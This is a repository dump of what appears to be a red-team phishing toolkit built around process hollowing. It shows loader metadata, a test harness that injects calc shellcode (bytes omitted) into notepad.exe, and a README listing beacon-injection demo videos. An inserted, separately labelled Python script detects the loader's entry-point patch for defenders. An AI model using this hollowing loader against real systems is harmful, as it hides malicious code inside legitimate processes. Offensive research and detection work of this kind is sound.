            section_ = new IntPtr();
            localmap_ = new IntPtr();
            remotemap_ = new IntPtr();
            localsize_ = new IntPtr();
            remotesize_ = new IntPtr();
            inner_ = new byte[0x1000]; // Reserve a page of scratch space
        }
    }
}
--------------------------------------------------------------------------------
/ProcessHollowing/ShellLoader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ShellLoader")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ShellLoader")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components.
// If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("b8282841-0368-48b9-98eb-53bd511422d9")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/ProcessHollowing/ShellLoader/ShellLoader.csproj:
--------------------------------------------------------------------------------
(MSBuild project file; the XML element tags did not survive extraction, only the element values below, in file order)
Debug
AnyCPU
{B8282841-0368-48B9-98EB-53BD511422D9}
Library
Properties
ShellLoader
ShellLoader
v3.5
512

true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4
true

pdbonly
true
bin\Release\
TRACE
prompt
4
true
--------------------------------------------------------------------------------
/ProcessHollowing/TestApp/App.config:
--------------------------------------------------------------------------------
(XML configuration file; its content did not survive extraction)
--------------------------------------------------------------------------------
/ProcessHollowing/TestApp/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using ShellLoader;

namespace TestApp
{
    class Program
    {
        static void Main(string[] args)
        {
            /* Run Calc */
            byte[] shellcode = new byte[193] {
                /* 193 payload bytes omitted from this listing */
            };

            var ldr = new Loader();
            try
            {
                ldr.Load("notepad.exe", shellcode);
            }
            catch (Exception e)
            {
                Console.WriteLine("[x] Something went wrong!" + e.Message);
            }

            //Console.ReadKey();
        }
    }
}
--------------------------------------------------------------------------------
/ProcessHollowing/TestApp/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("TestApp")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("TestApp")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("940ff99b-c2d3-4614-a9a1-eb6a7ad08858")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/ProcessHollowing/TestApp/TestApp.csproj:
--------------------------------------------------------------------------------
(MSBuild project file; the XML element tags did not survive extraction, only the element values below, in file order)
Debug
AnyCPU
{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}
Exe
TestApp
TestApp
v3.5
512
true

x86
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4
true

AnyCPU
pdbonly
true
bin\Release\
TRACE
prompt
4

{b8282841-0368-48b9-98eb-53bd511422d9}
ShellLoader
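Defender-side check, added here as an example and not code from InfoPhish or Aaron Bray's ProcessHollowing project: it walks the same IMAGE_DOS_HEADER / IMAGE_OPTIONAL_HEADER offsets that `GetEntryFromBuffer` uses to find a module's entry point (with the signature and bounds checks that function skips), then tests whether the bytes at that address are the `mov eax/rax, imm; jmp eax/rax` stub that `BuildEntryPatch` writes, which is what an analyst examining a suspended or suspected hollowed process would look for. The header page, module base, jump target and the `FakeMemory` stand-in for ReadProcessMemory are all constructed for the example.

```python
"""Entry-point patch detection for the stub written by ShellLoader.BuildEntryPatch."""
import struct
from typing import Callable, Optional

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\x00\x00"


def entry_point_rva(image: bytes) -> int:
    """AddressOfEntryPoint via the offsets Loader.GetEntryFromBuffer walks
    (e_lfanew at 0x3c, optional header at NT+0x18, entry RVA at opt+0x10),
    plus the signature and bounds checks the loader leaves out."""
    if len(image) < 0x40 or image[:2] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    opt = e_lfanew + 0x18
    if opt + 0x14 > len(image) or image[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("bad e_lfanew or missing PE signature")
    return struct.unpack_from("<I", image, opt + 0x10)[0]


def detect_entry_patch(entry_bytes: bytes) -> Optional[dict]:
    """Recognise the stub BuildEntryPatch places over the entry point:
    x86: B8 <imm32> FF E0      (mov eax, imm32; jmp eax)
    x64: 48 B8 <imm64> FF E0   (mov rax, imm64; jmp rax)
    Returns the decoded jump target, or None if the bytes are not that stub."""
    if len(entry_bytes) >= 7 and entry_bytes[0] == 0xB8 and entry_bytes[5:7] == b"\xff\xe0":
        return {"arch": "x86", "target": struct.unpack_from("<I", entry_bytes, 1)[0]}
    if len(entry_bytes) >= 12 and entry_bytes[:2] == b"\x48\xb8" and entry_bytes[10:12] == b"\xff\xe0":
        return {"arch": "x64", "target": struct.unpack_from("<Q", entry_bytes, 2)[0]}
    return None


def check_process_entry(header_page: bytes, module_base: int,
                        read_memory: Callable[[int, int], bytes]) -> dict:
    """header_page is the first page at module_base (what the loader reads after
    following PEB->ImageBaseAddress); read_memory(addr, size) stands in for
    ReadProcessMemory. Reports whether the live entry point carries the stub."""
    entry_va = module_base + entry_point_rva(header_page)
    stub = detect_entry_patch(read_memory(entry_va, 16))
    return {"entry_va": entry_va, "patched": stub is not None, "stub": stub}


# ---- constructed sample data (not a real binary or process) ----------------

def build_sample_headers(entry_rva: int = 0x1400, pe64: bool = True) -> bytes:
    """Minimal constructed header page: MZ, e_lfanew=0x80, PE signature,
    IMAGE_FILE_HEADER, and an optional header whose AddressOfEntryPoint is entry_rva."""
    page = bytearray(0x1000)
    page[0:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", page, 0x3C, 0x80)
    page[0x80:0x84] = IMAGE_NT_SIGNATURE
    machine, opt_size = (0x8664, 0xF0) if pe64 else (0x14C, 0xE0)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    struct.pack_into("<HHIIIHH", page, 0x84, machine, 1, 0, 0, 0, opt_size, 0x22)
    opt = 0x80 + 0x18
    struct.pack_into("<H", page, opt, 0x20B if pe64 else 0x10B)  # optional header Magic
    struct.pack_into("<I", page, opt + 0x10, entry_rva)          # AddressOfEntryPoint
    return bytes(page)


class FakeMemory:
    """Sparse address space standing in for ReadProcessMemory on a live process."""
    def __init__(self) -> None:
        self.chunks: dict = {}

    def write(self, addr: int, data: bytes) -> None:
        self.chunks[addr] = bytes(data)

    def read(self, addr: int, size: int) -> bytes:
        for base, data in self.chunks.items():
            if base <= addr < base + len(data):
                return data[addr - base:addr - base + size]
        return b"\x00" * size


def demo(patched: bool = True) -> dict:
    """Simulate a 64-bit target whose entry point carries either the hollowing
    stub (jumping to a constructed section address) or an ordinary prologue."""
    module_base = 0x7FF640000000  # constructed image base
    headers = build_sample_headers(0x1400)
    mem = FakeMemory()
    mem.write(module_base, headers)
    entry_va = module_base + 0x1400
    if patched:
        mem.write(entry_va, b"\x48\xb8" + struct.pack("<Q", 0x1A2B0000) + b"\xff\xe0")
    else:
        mem.write(entry_va, b"\x48\x83\xec\x28\xe8\x00\x00\x00\x00")  # sub rsp,28h; call ...
    return check_process_entry(headers, module_base, mem.read)


if __name__ == "__main__":
    print(demo(True))
    print(demo(False))
```

Against a real process the same logic applies to the first page read at the image base and the bytes read at the computed entry VA; a stub whose target lies in an RWX mapped section rather than in the image is the signature of this loader.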
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# InfoPhish

## Setup - Build Environment

- Windows 10 Pro Build: 16299
- Visual Studio Professional 2012
- Visual Studio C# Support
- Visual Studio Tools for Applications 2012
- Office Professional Plus 2013
- .NET Framework 3.5 SP1

## File Structure

## Process Hollowing Process Used

## Example Builds

VIDEO SERIES ON YOUTUBE: [INFOPHISH](http://www.youtube.com/playlist?list=PLqEXLZOvVefwVbO2mswKGdjFiPdhkuobT)

- HelloWorld: [HelloWorld.mp4](../VideoExamples/HelloWorld-Example-mainc.7z)
- CalcPleaseFail: [CalcPleaseFail.mp4](../VideoExamples/CalcPlease-Example-Fail-mainc.7z)
- CalcPleaseWin: [CalcPleaseWin.mp4](../VideoExamples/CalcPlease-Example-Win-mainc.7z)
- CsPleaseInjection: [CalcPleaseInjection.mp4](../VideoExamples/CsPlease-Beacon-Injection-mainc.7z)
- CsPleaseHollow: [CalcPleaseInjection.mp4](../VideoExamples/CsPlease-Beacon-ProcessHollow-mainc.7z)

## Credits
* Steve Borosh @424f424f – Helped with deployment
* Chris Ross @Xorrior & Jesse Reiner @unclejesse – Helped with phishing aspects
* Aaron Bray @Ambray – Built PE Hollowing
* Alexander Rymdeko-Harvey @Killswitch-GUI - TTP Dev
--------------------------------------------------------------------------------
/Setup/dotNetFx35setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Setup/dotNetFx35setup.exe
--------------------------------------------------------------------------------
/Setup/mu_intellitrace_collector_for_visual_studio_2012_x86_921040.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Setup/mu_intellitrace_collector_for_visual_studio_2012_x86_921040.exe
--------------------------------------------------------------------------------
/Setup/vsta_setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Setup/vsta_setup.exe
--------------------------------------------------------------------------------
/The-Path-To-Info-We-Missed.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/The-Path-To-Info-We-Missed.pdf
--------------------------------------------------------------------------------
/VideoExamples/CalcPlease-Example-Fail-mainc.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CalcPlease-Example-Fail-mainc.7z
--------------------------------------------------------------------------------
/VideoExamples/CalcPlease-Example-Win-mainc.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CalcPlease-Example-Win-mainc.7z
--------------------------------------------------------------------------------
/VideoExamples/CsPlease-Beacon-Injection-mainc.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CsPlease-Beacon-Injection-mainc.7z
--------------------------------------------------------------------------------
/VideoExamples/CsPlease-Beacon-ProcessHollow-mainc.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CsPlease-Beacon-ProcessHollow-mainc.7z
--------------------------------------------------------------------------------
/VideoExamples/HelloWorld-Example-mainc.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/HelloWorld-Example-mainc.7z
--------------------------------------------------------------------------------